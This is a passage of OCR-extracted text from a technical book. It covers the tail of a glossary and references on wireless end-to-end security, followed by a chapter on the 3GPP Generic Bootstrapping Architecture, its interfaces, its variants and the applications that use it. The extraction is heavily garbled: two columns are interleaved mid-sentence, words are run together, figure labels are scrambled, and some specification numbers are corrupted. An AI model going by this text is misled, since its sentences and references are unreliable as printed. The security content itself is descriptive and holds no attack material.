Kitsos, P., Sklavos, N., & Koufopavlou, O. (2004,
for multiplexing various cell calls. Therefore it does
May 12-14). An end-to-end hardware approach
not divide the channel into time slots (time domain
security for the GPRS. In IEEE Mediterranean
multiple access [TDMA]) or frequency bands (fre-
Electrotechnical Conference.
quency division multiple access [FDMA]). Instead,
Mandin, J. Secure Association Establishment for CDMA encodes data with codes associated with
PKM-EAP, IEEE 802.16 Broadband Wireless every channel; therefore they do not have any
Access Working Group Project, 2004-03-17 Re- overlaps in time or frequency bands. CDMA is a
trieved from http://www.ieee802.org/16/tge/con- major improvement in cellular technologies.
trib/C80216e-04_46r1.pdf
Customer-Premises Equipment (CPE): End
Mynttinen, J. (2000, November 27). End-to-end communication device that local subscribers
security of mobile data in GSM. Helsinki University communicate to. Through CPE, the information
of Technology, Finland. transmitted to and from all local subscribers are
transmitted back to the centre.
Pagliusi, P. S. (2002). A contemporary foreword
on GSM security. Retrieved from http://jazi.staff. End-to-End (E2E): E2E security covers the
ugm.ac.id/IC3-Royal%20Holloway/GSM_Secu- system’s security functionality and performance
rity_v4.pdf from one end to the other and back.
PartAir:6 1 interfaceforfixedandmobile - broadGeneral Packet Radio Service (GPRS):
band wireless access systems. (2004). Draft GPRS is an extension to GSM technology, which
IEEE Standard for Local and metropolitan area offers higher data rates compared to GSM. GPRS
networks. Retrieved from http://ieeexplore.ieee. is considered a 2.5G technology.
org/iel5/10676/33683/01603394.pdf
Global System for Mobile Communications
Puthenkulam, J., & Mandin J. 6e1 2.80 Security (GSM): GSM is the most popular standard and
Adhoc Proposal, IEEE C802.16e-03/70, IEEE one of the oldest technologies still used for cellular
802.16 Presentation Submission Template (Rev. networks throughout the world. GSM is considered
8.3). Retrieved Nov 13, 2003 from http://www. a 2G cellular technology with digital integration.
ieee802.org/16/tge/contrib/C80216e-03_70.pdf
Initialization Vector (IV): IV is a block of
Soyjaudah, K. M. S., Hosany, M. A., & Jamaloo- bit streams that is attached to every security data
deen, A. (2004, October 24-26). Design and to produce a unique and independent stream for
implementation of Rijndael algorithm for GSM encryption.
encryption. In Mobile Future, 2004 and the Sym-
Mobile Subsciber Station (MSS) = Mobile
posium on Trends in Communications. SympoTIC
Station (MS): These are end-user devices.
’04. Joint IST Workshop.

Pairwise Master Key (PMK): PMK is used in Virtual Private Network (VPN): VPN is a
peer-to-peer communication schemes for sharing a communications tunnel uses a pre-existing (and
master key that would last the entire session. This often unsecure, such as the Internet) network to
is mainly used for data encryption and integrity. connect a remote user to a corporate network. The
information is tunneled, encapsulated, and en-
Privacy Key Management (PKM): PKM is
crypted when passes through the unsecure network.
a private key scheme used with EAP and TLS
Once the information reaches the destination, it is
for providing E2E security schemes for wireless
decapsulated and decrypted.
technologies.
Worldwide Interoperability for Microwave
Third and Fourth Generation (3G/4G):
Access (WiMAX): WiMAX, which has been
3G/4G cellular networks are used in the context of
defined by the WiMAX Forum, formed in. 1 02
mobile standards. The services associated with 3G
WiMAX is also known as IEEE 802.16 standard,
are capable of transferring both voice and non-voice
officiallytitled;WirelessMANandisanalternativ
datasimultaneously.Thoughnotofficialyet,theG,4
to DSL (802.16d) and cellular access (802.16e).
however, will be fully IP-based converging wired
and wireless access technologies. It is expected to
reach bandwidth within a few hundred mega bit EndnotE
persecondofferingE2EQoS. 1
1
Transport Layer Security (TLS): TLS is used Kim, Y. K., & Prasad, R. 4G roadmap and
mostly in client/server applications, which require emerging communication technologies.
endpoint authentication and communications pri- Artech House.
vacy, particularly over the Internet. This is mostly
done using cryptographic measures.

Chapter XXIV
Generic Application Security in
Current and Future Networks
Silke Holtmanns
Nokia Research Center, Finland
Pekka Laitinen
Nokia Research Center, Finland
AbstrAct
This chapter outlines how cellular authentication can be utilized for generic application security. It
describes the basic concept of the generic bootstrapping architecture (GBA) that was
3rd generation partnership project (3GPP) for current networks and outlines the latest developments
for future networks.The chapter will provide an overview of the latest technology trends in the area of
generic application security.
IntroductIon The main function of GBA and also its dialects

and variations are explained. GBA has been ad-
Applications in wireless networks require a very opted by various standardization bodies and used
reliable method for user authentication and com- by many applications. GBA was first embraced
munication security. We will outline the reason for by mobile applications, like the 3GPP Mobile
the security needs for mobile application compared Broadcast Multicast Service, open mobile alliance
to Internet application security. It starts with the (OMA) presence service, OMA broadcast smart
application specific security approach - card service
used to protectionprofile,GBAProfile,and
day by many mobile operators and describes the so forth.
motivation that lead into the development of the Theongoingconvergenceoffixedandmobile
generic bootstrapping architecture (GBA) of 3rd network resulted in the adaptation of GBA-based
generation partnership project (3GPP). applicationsecurityforfixedandcablenetworks
We close with a snapshot of the ongoing work for
Generic Application Security in Current and Future Networks
application security in beyond third generation • Development costs: Development of mobile

(B3G) networks. applications is much more expensive than that
for Internet usage, hence if an application is
seriously compromised, then the resulting
APPlIcAtIon sEcurIty loss is much higher.
foundAtIons In MobIlE • Updating problem: In the fixed network
nEtworks environment security patches and updates are
a daily occurrence, this is not that common in
the mobile environment. Even if some mobile
special requirements for Mobile
software platforms offer the possibility to
Application security
be updated via a PC or over-the-air (OTA)
mechanisms.
Applications in wireless networks require a very
• Protection of investments: Mobile opera-
reliable method for user authentication and commu-
tors make big investments in their network
nication security due to their special environment.
infrastructure; hence reusage of deployed
There are the following security reasons for this:
network nodes needs to be taken into account.
Especially, when new services are rolled out,
• The communication to the service provider
these services should work in a harmonic way
goes over the air and can be eavesdropped
with the existing nodes.
ormodified,ifnotproperlysecured.
• Existing smart card base: Operators hand
• The service may be offered over any kind of
out smart cards to their subscribers, these
IP-based channel, then the protection of the
cards have very different capabilities (e.g.,
service by the underlying bearer protocol can
subscriber identity module (SIM) cards,
not be taken for granted. The authentication
universal SIM [USIM], etc.), and operators
and the service usage may be performed over
are unlikely to replace already handed out
different channels.
smart cards. It is more likely, that the user
• Username/password authentication is not very
replaces the device. A smart card is replaced,
secure or user friendly on a mobile device
when a user changes operators.
with numeric keypad; hence the temptation to
• Service usage costs: The cost of browsing is
choose too short or easy-to-write passwords
bound to the type of access the user is using.
is even greater than in the fixed network
When mobile access is used, this may imply
environment.
somesignificantcostsfortheuser.Also,some
mobile service fees already include the access
Operators or third parties that provide server-
cost, that is, the user does not have to pay twice
based applications in mobile networks have to face
for the content and the delivery. Hence, user
additional challenges that reflect on the choice
authentication comes in mobile applications
of a potential security solution for application
“earlier” than in the Internet case.
security:
• Reliability and availability: If an Internet
application does not work, because the au-
• Roaming agreements: The home operator
thentication database crashed, then in many
of a user maybe liable to roaming partners
cases this is not that severe an issue and the
or application providers, if an unauthorized
user can still use other services (except for
user uses a service. This potential liability
those 100% online shops like amazon.com).
could even be exploited by malicious ap-
But if the operator’s subscriber database can
plication providers. This is no empty threat,
not be reached, users can not make phone
as the malicious usage of premium short
calls, roam, send SMS messages, and, in the
message service (SMS) usage is an existing
end, the operator has no opportunity to offer
problem.
0
any kind of service and obtain revenue. The considered, that is, why spend a lot of money, if it
availability and reliability requirements for will not be used. This subsection describes how
mobile network nodes are very high. application security is often managed today and
• Scalability: Scalability of mobile networks how it was managed in the past and what are the
security solutions is a critical factor. Solu- problems related to it:
tions are standardized on a global level, for
example, for small local operators, as well • Voice: The terminal authenticates to the
as for large international operators. Hence, network utilizing a shared secret stored in
solutions have to work also for millions of the smart card and the operator’s subscriber
people at the same time and it must be possible database. For application security needs, the
to extend them gradually depending on the authentication vectors (AVs) are distributed
growing subscriber basis. Usage scenarios to the corresponding nodes.
and scalability requirements, where a whole • Early IP multimedia subsystem security
full soccer arena at once requests one service (IMS): The 3GPP early IMS security solu-
server and still the service should work and tion of Release 6 (3GPP, TR33.978, Release
start on time, are not unusual. 6) uses IP address binding, that is, the IP ad-
• Convergence: For operators that run both dress assigned by the gateway GPRS support
fixedandmobilenetworkstheissue - ofcon
node (GGSN) is used for subsequent user
vergence gains importance, since it allows a authentication to the IMS service.
moreexible
fl re-useofthenetworkbackend • IMS: The IMS security is bound to the cre-
servers and functions. dentials of the IMS SIM (ISIM) application on
Whenthefirstmobileapplicationsstarted after
the universal integrated circuit card (UICC)
voice and SMS the requirements for a more generic smart card and these credentials are used by
application security were not clear. This resulted the mobile terminal for authentication to the
in a fast to roll-out, but with less generic approach IMS network. This is outlined by 3GPP (TS
as will be explained next. 33.203,Release 6). The user authentication
is delegated from the operator’s subscriber
Historic Approaches to Application database towards the IMS network (i.e., the
security serving call-session-control-function [S-
CSCF]).
Application nodes in mobile networks in the past
tend to have a monolithic security solution that is The first mobile application was voice and
highly customized to the individual application. few people envisioned the further usage mobile
This has to do with the fact, that operators like to networks would get and were surprised by the
buy their equipment from various vendors, and popularity of SMS. 3GPP IMS with its wide range
re-usage and extensions of existing infrastructure ofservicepossibilitieshassecurity - wisetwoa
fl
requires standardized interfaces. This standard- vors: (1) IP address binding, which comes quite
ization takes quite some time and that backward inexpensive to mobile operators, and (2) the full
compatibility and integration with the existing IMS security, which requires that the subscriber
nodes is a big challenge. Another argument for is equipped with a new smart card that contains
having customized security solution was that an ISIM application on it. The early IMS security
there were not that many new applications were solution has its cost-wise advantages and allows
not expected to come with a fast pace. For applica- a roll-out and provisioning of the service also to
tion security the return of investment was also an subscribers with “old” smart cards, but the usage
important consideration. The systemofhad monolithic
first to and application specific security
attract some subscribers and be accepted, before solutions cause some problems. Additionally, the
an expensive security solution of higher quality is direct usage of AVs in applications causes some

general problems that require a more generic ap- calfactor,themodificationofwell-running

proach.Thespecificandgeneralissuesaresystems listed is a very sensitive issue.
as follows:
There were some early non-standardized ap-
• Fraud potential: With the convergence of proaches to re-use the existing authentication
networksIPaddressspoofingmaybecome a
infrastructure of an operator for general applica-
threatforapplicationspecificsolutions tion specific that securityGerstenberger,
( Lahaije, &
utilize IP address binding. Schuba, 2004). The aforementioned issues lead
• Scalability: The IP address binding solution in 3GPP and 3GPP2 to the standardization of the
is not very well scalable for large networks and GBA.
large amounts of simultaneous service-users.
It is difficult to scale for many application generic bootstrapping Architecture
scenarios in diverse future networks, where (gbA)
users may roam between network types.
• Performance and dependability: The back- We will now introduce the GBA nodes, the provided
bone subscriber database, that is, the home functionality, and the interworking. The main goal
subscriber server (HSS) or the home location of GBA is to provide a common shared secret to
register-authentication center (HLR-AuC) an application server and a mobile terminal based
should not be contacted too often to obtain on the cellular authentication, the details of this
fresh user credentials, since these databases protocol are described in the 3GPP technical speci-
are very large and if this database is going ficationGPP 3 ( TSRelease
, 02. 3 and
6) wewill
down due to overload requests from applica- focus on this aspect.
tion servers, then the operator can not even The application. The basic setting is that we
offer simple voice calls. have an application server that offers services to
• Synchronization problems: If a new appli- the user. The application service does not need
cation utilizes the smart card based authen- necessarily to be part of the operator’s network.
tication, then they consume AVs from the There is a general trend to outsource the appli-
HSS/HLR-AuC. This can lead to sequence cation services to external parties and just take
number synchronization problems, which selected services into the “operator portal.” This
becomes more severe when the number of service should now be secured using the mobile
services increases. smart card credentials and hence the existing trust
• User experience: Different user authentica- relationship between the user and the operator. For
tion methods often result in bad user experi- this purpose, the service provider needs to have
enceanddifficultiesforthehelp-desk ifthewith the home operator of the user.
an agreement
authentication fails for unknown reasons. This application server has two subcomponents,
• Combined networks: If an operator has one that takes care of fetching credentials from
broadbandfixednetworkaccessand mobile
the user’s home network and is called network
networks, then the broadband subscriber may application function (NAF) in GBA and then the
not have the ISIM or the IP address assigned actual application itself that uses the credentials
from the GGSN. to secure the communication with the mobile ter-
• Future proof: New applications need new minal, which we call application service.
security solutions. If the network is struc- The terminal. A 3GPP terminal is called user
tured in separate monolithic pillars, then the equipment (UE). In strict 3GPP terms it has two
re-usage of the existing infrastructure for components, the smart card (UICC) and the mo-
securityisverydifficultwithoutbile modifying
equipment (ME). We will refine this model
the already deployed infrastructure. Since slightly, by also distinguishing between the device
in telecommunication availability is a criti- platform and the application in the terminal. The

Figure 1. Generic bootstrapping architecture
HSS
Zh: Credential fetching protocol
Bootstrapping Netw ork

Server (BSF) Application
Zn: Key Server (NAF)
distribution
Ub: Bootstrapping
protocol
protocol Application
service
Smart Security Application
Card Module Server
NAF
Client Ua: Application
protocol
User Equipment
UE can authenticate with the network using cellular including the counterpart of the credentials (i.e.,
second generation (2G) or 3G-based authentication master key) stored in the smart card that is handed
protocols. The intention is to reuse the authentica- out to the user and resides in the mobile terminal.
tion mechanism for the application communication This database provides the basic key material
security. Hence, we have a security module (see (i.e., authentication vector) to the BSF that is un-
Figure 1) that communicates with the smart card der mobile network operator control. This server
and the so-called bootstrapping server function can be seen as a credential server. Once the user
(BSF). Then there is the actual client application is properly authenticated the BSF generates the
(NAF client) that communicates with the applica- applicationspecifickeyswhicharehandedoutto
tion server (NAF server) in the network, and uses the application server, that is, the NAF.
theapplicationspecifickeys. The GBA system entities need to interact
The smart card. 3GPP Release 6 and Release with each other to provision the application in the
7 GBA assume the existence of a UICC. The UICC terminal and the application server with a shared
contains an ISIM and/or USIM application. If the secret that can then be utilized for various security
operator wishes that the application is really closely purposes:
bound with the smart card, then he/she can utilize
the so-called GBA aware smart card (GBA_U), • Bootstrapping interface (Ub): The mobile
wheretheapplicationspecifickeygeneration and
terminal contacts the BSF and authenticates
part of the storage is performed in the UICC. GBA via authentication and key agreement (AKA)
can be used also with SIM cards. This 2G GBA and triggers the key generation in the BSF.
was introduced in Release 7 in the 3GPP techni- This interface is called Ub interface and
cal report (3GPP TR 33.920, Release 7) due to the defined in theGPP 3 technical specification
large market need to allow operators to utilize the (3GPP TS 24.109, Release 6).
existing smart card infrastructure without being • Credential fetching interface (Zh): The
forced to hand out immediately new smart cards applicationspecificcredentialsarebasedo
to the user to use GBA-based services. the mobile credentials stored in the subscriber
The network. The heart of the network is the database HSS of the operator. Therefore the
operators subscriber database the HSS, respec- BSF needs to obtain the AV to be able to
tively the HLR with accompanied AuC. This establish an authentication session between
huge database is used to store the subscriber data the mobile terminal and the BSF and derive

furtherapplicationspecifickeys.Also, 1. some
The user wishes to use a service. The applica-
operator policies in the form of GBA user tion server wishes to utilize GBA to secure
security settings (GUSS) can be stored in the the communication to the terminal. Hence,
HSS and passed to the BSF over this interface. the terminal is requested to use GBA. This
The GUSS can contain application specific information (i.e., whether GBA needs to be
USSsandadditionallyBSF-specificguidance used)canbepre-configuredtotheNAFclient,
information,likeuser-specifickeylifetimes, or the application server may indicate over
and UICC type of the user. The credential in- Ua interface that GBA should be used.
terfaceisdefinedasZhinterfaceand 2. specified
The NAF client triggers the security module
intheGPP 3 technicalspecificationGPP 3 ( TS in the terminal to bootstrap with the BSF
29.109, Release 6). This interface is opera- utilizing AKA over the Ub bootstrapping
torinternalandspecifiedasbeingDiameter interface.
based (Calhoun, Loughney, Guttman, Zorn, 3. The BSF then utilizes the Zh interface to
& Arkko, 2003) by the Internet Engineering fetch the needed data for the creation of the
Task Force (IETF), but since many operators master session key. The BSF derives the
have highly customized HLR/HSS it can be master session key. Based on this master
expectedthatoperator-specificadjustments session key NAF specific application keys
will be made (but likely not standardized). are derived when a specific NAF requests
• Key distribution interface (Zn): The appli- it over Zn interface later on. (Depending on
cation server has a library or a “plug-in” that the GBA type used, one or two application
requeststheapplication-specificcredentials, specifickeysarederived.)
credential-related data, and USS from the 4. The resulting master session key and transac-
credential server (BSF). This key distribution ID are stored in BSF server. The security
tion interface in 3GPP Release 6 Diameter module in terminal also derives the master
based and called Zn interface. In Release 7, session key by contacting the smart card.
analternativemethodwasspecified - tosup
The master session key and the transaction
port Web services (WS)-based protocol as ID are stored in the security module. Note,
this makes it easier for application developers that here are small differences between the
to communicate with the credential server. different GBA types. Based on this master
Both implementations of the Zn interface are session key, NAF-specific application keys
defined in theGPP 3 technical specification are derived. The application-specific key is
(3GPP TS 29.109, Release 7). handed out to the NAF client application in
• Application interface (Ua): The applica- the terminal as response to the initial trigger
tion-specificinterfaceiscalledUainterface madeinstepThe 2. application-specifickey
andspecifiedinGPP 3 ( TS The
. 0 2 6 ) , 09 1 . 4 2 is used to secure the communication with the
details of the actual protocol used in the Ua application server.
interface depend on the actual use case, for 5. The NAF client in the terminal sends transac-
example, browsing, streaming, and so forth. tionidentifiertoNAFserverintheapplicatio
Thederivedapplication-specificcredentials server over Ua application interface. This
will be used to secure the communication of transaction ID is needed, so that the NAF can
this interface, how this is done, is application contact the BSF and fetch the correct keys.
specificanddefinedintheapplication- 6. specific
The NAF server in the application server
specifications,forexample, 3GPP multimedia contacts the BSF to obtain the application-
broadcast/multicast service (MBMS) techni- specificsessionkeysfromBSFusing - trans
cal specificationGPP 3 ( TS,46.2 3Release action identifier over Zn key distribution
6). interface.
Theactualapplication-specifickeygeneration 7. The NAF server in the application server
consists of the following basic steps: and the client in the terminal now share

Figure 2. HTTP based service request using GBA_ME (and GBA-unaware USIM)
UE NAF specific Key:

GBA- Security Terminal Ks_NAF
unaw are Module Appl. BSF HSS NAF
USIM
HTTP request for a service
0 Unauthorized / GPP GBA authentication required

Request for GBA keys (NAF_ID)
Query for IMSI

IMSI
Bootstrapping init iation m essage (IMPI)
Query for AV, GUSS
GBA AV, GUSS
Bo o
Bootstrapping challenge (RAND, AUTN)
RAND, AUTN t st r a
CK, IK, RES p pi n
g
Bootstrapping response (RES used as passw ord)
Bootstrapping OK (B-TID, key lifetim e)
B-TID, Ks_NAF, key lifet im e
HTTP request that utilizes Ks__NAF as outlined by application specification

B-TID, NAF_ID, [GBA_U_flag], [GSID* ]
Ks_NAF, IMPI, key lifetime, [USS* ]

Communication secured w ith Ks_NAF
application-specifickey(s)thatthey • can use GBA_U is a GBA type that requires

GBA_U:
for authentication or other ways to secure a special smart card that supports GBA and
the communication between terminal and is “GBA aware.” The motivation for this was
application server. the cryptographic key generation is bound
In 3GPP there are basically three different ways then very closely to the smart card and the
togenerateapplication-specificcredentials issuinginoperator.
GBA. The master key and the
The previous basic steps are the same for all three application-specific keys (Ks_ext_NAF
types and should be seen as the basic GBA schemes. and Ks_int_NAF) are derived in the GBA
The variations were caused by different security aware USIM application in an UICC. Only
requirements, business models, and market needs. theKs_ext_NAFapplication-specificsession
The three GBA types are: key is handed out to the terminal. A second
application-specificsessionkeyKs_int_NAF
• GBA_ME: This is the terminal-based GBA. is not handed out and is stored and used only
It requires a 3GPP UICC smart card, but in the UICC. Figure 3 outlines the message
the smart card does not need to be specially ow
fl forGBA_U.GBA_UisdefinedinGPP 3(
configuredtosupportGBA_ME.TheUICC TS 33.220, Release 6). It should be noted, that
can contain either an ISIM or a USIM appli- theBSFmodifiestheAVreceivedfromthe
cation that can be used by GBA. The master HSS. This gives an indication to the GBA-
sessionkeyandtheapplication-specific keys
aware USIM, and the USIM returns just the
are derived in the terminal. GBA_ME is also RES and not the secret CK and IK keys to the
sometimes referred to as “normal GBA”. Fig- terminal. The details on how those keys are
ureoutlines
2 themessageow fl forGBA_ME. usedaredefinedbytheapplication-specific
GBA_ME is defined in theGPP 3 technical documents, like MBMS (3GPP TS 33.246,
specificationGPP 3 ( TS,Release
02. 3 . 6) 2006), HTTPS (3GPP TS 33.222, 2006) or

Figure 3. HTTP-based service request using GBA_U (GBA-aware USIM)
UE NAF specific Keys:

GBA- Security Terminal Ks_int_NAF, Ks_ext_NAF
aware Module Appl. BSF HSS NAF
USIM

Query for IMSI

IMSI
Bootstrapping initiation message (IMPI)
Query for AV, GUSS
GBA AV, GUSS
RAND, AUTN
Bo
o t st
RES
r ap p
ing
Bootstrapping OK (B-TID, key lifetime)

B-TID, key lifetime
NAF_ID, IMPI
Ks_ext_NAF
B-TID, Ks_ext_NAF, key lifetime
HTTP request that utilizes Ks_ext_NAF as outlined by application specification e.g. MBMS, HTPPS, etc)
B-TID, NAF_ID, GBA_U_flag, [GSID*]
Ks_ext_NAF, Ks_int_NAF, IMPI, key lifetime, [USS*]

Communication secured w ith Ks_ext_NAF
Secure data w ith Ks_int_NAF key
Secured Data
Communication secured w ith Ks_int_NAF
the OMA broadcast (BCAST) smart card In all, these three bootstrapping types have in
profile. common the basic steps outlined previously, and
• 2G GBA: The 2G GBA or legacy GBA is a only the key generation and storage varies slightly.
recentGPP 3 GBAfeatureanddefinedin Forthe
the application server the usage of GBA_ME
technical report (3GPP TR 33.920, 2006) as an and 2G GBA is transparent. The convergence of
early implementation feature for Release 7. It fixed and mobile networks is, at the time of this
outlines the usage of the SIM card for GBA. writing, raising new GBA variants that will be dis-
It should be noted, that it does not describe cussed later in this chapter under Future Trends.
the usage of a legacy network nodes with The specification family related to GBA has
GBA. The large deployment range of SIM grown substantially due to new application re-
cards created the need for a GBA credential quirements, further use cases, and new security
generation solution that is based on legacy enablers that were added. This will be outlined
SIM cards and does not require immediate in the next section. The GBA can also be utilized
handing out of new UICC smart cards to to provision a user with a subscriber certificat
the used. To obtain a similar security level and also trusted root certificate provisionin
than GBA_ME, the BSF node in the net- public key infrastructure (PKI) systems. These
work is authenticated via a transport layer are outlined in the GPP 3 technical specification
security (TLS) tunnel. The key derivation (3GGP TS 33.221, Release 6).
differs slightly, but the key usage is similar The term GBA refers typically to the core of
to GBA_ME. Figure 4 outlines the message GBA, where a master key is established between
ow
fl forG2 GBA. the mobile terminal (UE), and the network (BSF).
The notation for the Figures 2, 3, and 4 is that Generic authentication architecture (GAA) on the
the * denotes an optional element. other hand refers typically to the actual usage of
the service specific keys that have been derived

Figure 4. HTTP based service request using 2G GBA
UE NAF specific Key:

Legacy Security Terminal Ks_NAF
SIM Card Module Appl. BSF HSS NAF

Query for IMSI TLS (BSF authenticated using certificate)

IMSI
Bootstrapping initiation message (IMPI)
Query for AV, GUSS
GBA AV, GUSS
RAND
Bo o t st
r ap p
Kc, RES
ing
Bootstrapping OK (B-TID, key lifetime)
B-TID, Ks_NAF, key lifetime
HTTP request that utilizes Ks__NAF as outlined by application specification

B-TID, NAF_ID, [GBA_U_flag], [GSID*]
Ks_NAF, IMPI, key lifetime, [USS*]

Communication secured w ith Ks_NAF
Figure5.Genericauthentication/bootstrappingarchitecture
gbA gAA
HSS
HSS
Zh: Credential Fetching

Protocol
NAF Netw ork Application

Application
Function (NAF)
Server
Bootstrapping
Bootstrapping
Server Service
Server
ServerFunction
Function Zn: Key distribution
Server
(BSF)
(BSF) Protocol
Security Ub: Bootstrapping

Module and Protocol
Smart Card
User
User NAF
Equipm
Equipment
Client
ent Client Ua: Application
(UE)
(UE) Protocol

from the master key. Thus, GBA refers to the core Mobile networks Applications using
functionality and GAA to the actual usage of GBA gbA
in use cases, as depicted in Figure 5, but often it is
not necessary to differentiate strictly. GBA was initiated by GPP; 3 hence the first - ap
GAA and GBA are not only evolving in 3GPP, plications that utilize GBA were also from 3GPP
but also in the American counterpart standardiza- in their Release 6 and . 7 The first service to
tion organization the 3GPP2 (http://www.3gpp2. mandate the usage of GBA is the 3GPP mobile
org/). 3GPP2 utilizes the removable user identity broadcast/multicast service (MBMS) (3GPP TS
module (R-UIM) as a security baseline for their 33.246, Release 6). The broadcast scenario poses
dialect of GBA. 3GPP2 GBA supports the 3GPP2 some very special requirements on a key derivation
legacy algorithms Cellular Authentication and and management system, that is, a content provider
Voice Encryption (CAVE) algorithm, which is used specific key that can be linked to a mobile user
in the American CDMA1x, standard and challenge identity stored on the smart card, protection of the
handshake authentication protocol (CHAP), which contentprotectionkeys(keyconfidentialityduri
is used in American code division multiple access transport), and the baseline security key should
(CDMA) 1xEvDo (evolution data only), but also not be transported over the air. This resulted in
AKA for the user authentication. For further de- the fact that MBMS has a quite sophisticated four
tails on 3GPP2 GBA, please consult the relevant layer key hierarchy, where the user-specific keys
specificationGPP2 3 ( TSS.S009-.,26)1 are established using GBA.
Another use case is general authenticated Web
browsing. A user browses to a Web page that needs
APPlIcAtIon sEcurIty bAsEd on authentication. This is a quite common occurrence
tHE gEnErIc bootstrAPPIng in the Internet and there a user typically then has
ArcHItEcturE to provide a username/password combination. In-
serting a password on a mobile key pad is not very
In the beginning, GBA was developed to securely user friendly and would likely result in non-secure
providetheuserwithsubscribercertificates passwords, that where
is, without special characters, very
the initial registration of the user to public key short, no upper/lower case combinations. Many
interface (PKI) system is authenticated using security solutions ignore the usability aspect and
cellular authentication. The function to provide try to force the user, which usually results in more
anapplication-specificsharedsecretorbased onthepassword recovery systems. In
less expensive
mobile credentials to a terminal and a network the mobile environment, with a small key pad,
node evolved to a generic enabler for many use inserting long, secure passwords with special
cases and service. In this context, terminal refers characters is not user friendly. The integration of
to 3GPP or 3GPP2 mobile phone. an automatic scheme that provides automatically
GBA is not only used for a large range of ap- anapplication-specificusername/passwordpairto
plications that reside in a mobile network, but also the browser request is therefore desirable for the
forfixedbroadbandaccesssecurityandtheir access From a user perspective, the
mobile environment.
devices (e.g. PC or laptop). The work on GBA for authentication would either be seamless (i.e., the
the next 3GPP Release 8 and the integration of user does not even notice that this is ongoing) or
GBA into future networks B3G will be discussed it would be very similar to the user experience,
in the next section. In this section we outline the where the password is stored by the browser. The
different existing applications that use GBA as a technical side of the procedure runs as follows:
security enabler. We will not go into the details of
each application, but focus on the usage of GBA. 1. User contacts a service that requires HTTP
digest authentication.

2. The service triggers the terminal to generate application servers, depending on the request.
anapplication-specificsharedsecret. The AP Thismayisadd an assertion of identity of the
then established using GBA without further subscriber for use by the application server, when
user interaction. the AP forwards the request from the terminal to
3. The transaction ID are put into the username the application server.
fieldandthesharedapplication-specific secret
Operators can also utilize GBA for device
isputintothepasswordfield. management. For this use case, a device manage-
4. The data is validated and the user can access ment server takes the role of a NAF and establishes
the service. a HTTPS tunnel to the UICC as outlined in the
The details of this procedure can be found in 3GPP technical report (3GPP TR 33.918, Release
theGPP 3 specificationsGPP 3 ( TSRelease
, 02. 3 7). Through this secure tunnel the device manage-
6) and (3GPP TS 33.222, Release 6). ment information is then sent.
Web sites that request confidential Thedata
Europeanare Telecommunications Standards
often secured using TLS 1.0 or Secure Socket Institute (ETSI) has a Smart Card Platform Group
Layer (SSL) 3.0, which can be considered equiva- thathasdefinedsomeusecases,like - mobilebank
lent. GBA was integrated into the usage of TLS ing and digital rights management (DRM), which
between a mobile terminal and an application server require the existence of a secure channel between
in 3GPP Release 6 (3GPP TS 33.222, Release 6). the terminal and the UICC smart card. They asked
At the end of 2005 the Internet Engineering Task GPP
3 todefinethekeymanagementforthis - func
ForcespecifiedtheusageofPre-SharedKey TLS
tionality. This was done based on GBA in the 3GPP
in the IETF (RFC 4279) (Eronen & Tschofenig, technicalspecificationGPP 3 ( TS,0Release
1 .3
2005). 3GPP integrated the PSK TLS, since pre- 7) and is expected to be part of 3GPP Release 7. It
shared key computations are very suitable for low remainstobeseenwhichoftheusecasesdefined
capability devices like mobile phones (3GPP TS by the smart card group will be implemented.
33.222, Release 6). It should also be noted, that
PSK TLS can also be used with IETF Datagram network Agnostic usage of gbA
TLS (Rescorla & Modadugu, 2006).
A user may access a service directly or through GBA is also used outside of the classical mobile
an authentication proxy (AP), that takes care of environment of GPP. 3 The OMA defines bearer
the authentication-related tasks on behalf of the agnostic functionalities and services. Since au-
actual application server. If an operator offers thentication is in most cases bound to the bearer
many services, then he/she may wish to deploy some specifications integrate the authentica
such an authentication proxy to centralize the of the underlying bearer and provide additional
user authentication task in one node. An AP is an functionality for the case that another access type
HTTP reverse proxy which takes the role of the is used. GBA is used by the following OMA ap-
GBA NAF node (the application server) for the plications:
terminal. The AP handles the TLS security relation
with the terminal and is the TLS end point. GBA • OMA broadcast smart card profile
is used to ensure for the application server that (BCAST)defines
0 27 ) ( theusageofasmart
the service request is coming from an authorized cardprofileforcontentprotectionusingafour-
user. The AP has the Zn interface towards the BSF layer key hierarchy based on GBA (similar
and the Ua interface towards the terminal. When to MBMS key hierarchy.
a HTTPS request is sent from the terminal to the • In OMA presence and availability working
application server that resides behind an AP, then Group (PAG) (2006) the content server relies
the AP terminates the TLS tunnel and performs on external authentication and authorization
the terminal authentication. The AP proxies the done for the presence sources that may reside
HTTP requests received from UE to one or many

on the mobile terminal, and watcher nodes. where a shared secret between a terminal and a
For this authentication and authorization GBA network server is needed.
as defined in GPP 3 technical specification
(3GPP TS 33.222, Release 6) can be used for fixed—Mobile convergence and gbA
that purpose, acting as an AP.
• OMA secure user plane location (SUPL) The term converging networks has become a key
defines
0 2 6) ( theusageofhowtheterminal phrase in latest network evolution work. The trend
can acquire the location of itself from the tomergemobileandfixednetworkbackendsystems
network, and this messaging between the is caused by several factors:
terminal and the network can be optionally
protected by GBA. • Fewer and larger operators: There is a
• OMA XML document management (XDM) general consolidation trend in the industry,
and OMA aggregation proxywerespecified which results in large, often international,
by the OMA presence and availability work- operators.Theseoperatorsoftenhaveafixed
inggroup(PAG)These
. 0 2 6) ( specifications network and a mobile network. For them it
definemechanismshowterminals - canman is important that they can use one backend
age XML documents in the network servers. to serve both access types.
The authentication can be optionally by based • New players: The boundaries between
on GBA, and the authenticating node in the technologies are vanishing, as voice over IP
network can be either the XDM server itself, shows us. These new players appear and want
or it can be centralized using aggregation to utilize the existing technology, but on the
proxy, where all traffic to XDM servers isother hand want to preserve the investments
routed through the proxy. into infrastructure. Especially, for fixed
• OMA common security functions (CSF) networks the investments are substantial.
(OMA Security Working Group, 2005) Multi-network devices are no longer future,
definesagenericGBAProfileGBAProfile) ( but commercially available. This results in
that acts as an enabler and that other OMA extensions to the existing “pure” mobile
applications and enablers can use when they specific standards to integrate - the new re
aredefiningtheusageofGBAinthem. quirements and network types.
Another important standardization body, where • Seamless services: The general mobility
GBA fits in is the Liberty Alliance Project. Thecreates high user expectations, when
trend
Liberty Alliance Project enables identity federation somethingworkswithafixednetwork,then
(alias single sign-on) and Web service security. It it is also expected that is works seamlessly
is a non-mobile centric consortium that uses the in a mobile environment. This can only be
provided user authentication, but does not specify provided with a unified backend service
the actual means of authentication and its context. system.
This is left to the standardization bodies, which Thefixedmobileconvergenceisfocusedaround
define the actual authentication the method. GPP
3
IP multimedia subsystem (IMS), but GBA as
integrated their GBA to be used seamlessly with a general security enabler for applications moved
